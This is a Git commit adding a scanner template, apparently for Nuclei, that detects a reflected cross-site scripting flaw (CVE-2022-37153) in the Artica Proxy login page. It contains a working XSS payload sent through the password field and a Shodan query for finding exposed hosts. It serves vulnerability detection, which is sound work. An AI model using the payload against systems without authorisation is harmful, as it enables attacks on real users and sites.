Merge pull request #5199 from arafatansari/patch-71

Create CVE-2022-37153.yaml
patch-1
Prince Chaddha 2022-08-25 14:08:53 +05:30 committed by GitHub
commit c655e4c60d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2022-37153
info:
name: Artica Proxy - Cross Site Scripting
author: arafatansari
severity: medium
description: |
An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.
reference:
- https://github.com/Fjowel/CVE-2022-37153
- https://nvd.nist.gov/vuln/detail/CVE-2022-37153
classification:
cve-id: CVE-2022-37153
metadata:
verified: true
shodan-query: http.html:"Artica"
tags: cve,cve2022,xss,artica
requests:
- raw:
- |
POST /fw.login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Password" value="admin"><script>alert(document.domain)</script>'
- 'Artica Web'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200